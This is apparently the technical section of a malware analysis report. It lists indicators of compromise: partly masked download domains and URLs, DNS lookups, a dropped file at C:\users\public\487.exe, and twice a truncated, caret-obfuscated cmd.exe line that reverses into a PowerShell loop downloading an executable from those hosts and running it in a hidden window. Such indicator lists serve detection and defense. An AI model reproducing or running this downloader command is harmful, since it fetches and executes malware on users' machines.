Technical Information
- '<SYSTEM32>\cmd.exe' /V/C"^se^t ^8I=^ ^ ^ ^ ^ ^ ^ ^}^}^{^hctac}^;ka^er^b;U^qN$^ metI^-ekovnI^;)^UqN$ ,vl^P^$(el^i^F^da^olnwo^D.EVw${yrt^{)^f^j^z^$ n^i v^lP$(hc^aer^o^f^;'^exe.^'+Va^o^$+'^\^'^+c^i^l^b^u^p^...
- C:\users\public\487.exe
- C:\users\public\487.exe
- C:\users\public\487.exe
- 'ka###ang001.com':80
- 'er####eredoski.com':80
- 'tr###olve.com':80
- 'tr###olve.com':443
- 'on#####egalsoftware.com':80
- http://ka###ang001.com/xxwBiLY
- http://www.ka###ang001.com/xxwBiLY
- http://er####eredoski.com/C
- http://www.tr###olve.com/4ZO
- http://on#####egalsoftware.com/RPtWwdec
- http://www.on#####egalsoftware.com/RPtWwdec
- 'tr###olve.com':443
- DNS ASK ka###ang001.com
- DNS ASK er####eredoski.com
- DNS ASK tr###olve.com
- DNS ASK on#####egalsoftware.com
- DNS ASK ul###amer.com
- '<SYSTEM32>\cmd.exe' /V/C"^se^t ^8I=^ ^ ^ ^ ^ ^ ^ ^}^}^{^hctac}^;ka^er^b;U^qN$^ metI^-ekovnI^;)^UqN$ ,vl^P^$(el^i^F^da^olnwo^D.EVw${yrt^{)^f^j^z^$ n^i v^lP$(hc^aer^o^f^;'^exe.^'+Va^o^$+'^\^'^+c^i^l^b^u^p^...' (with hidden window)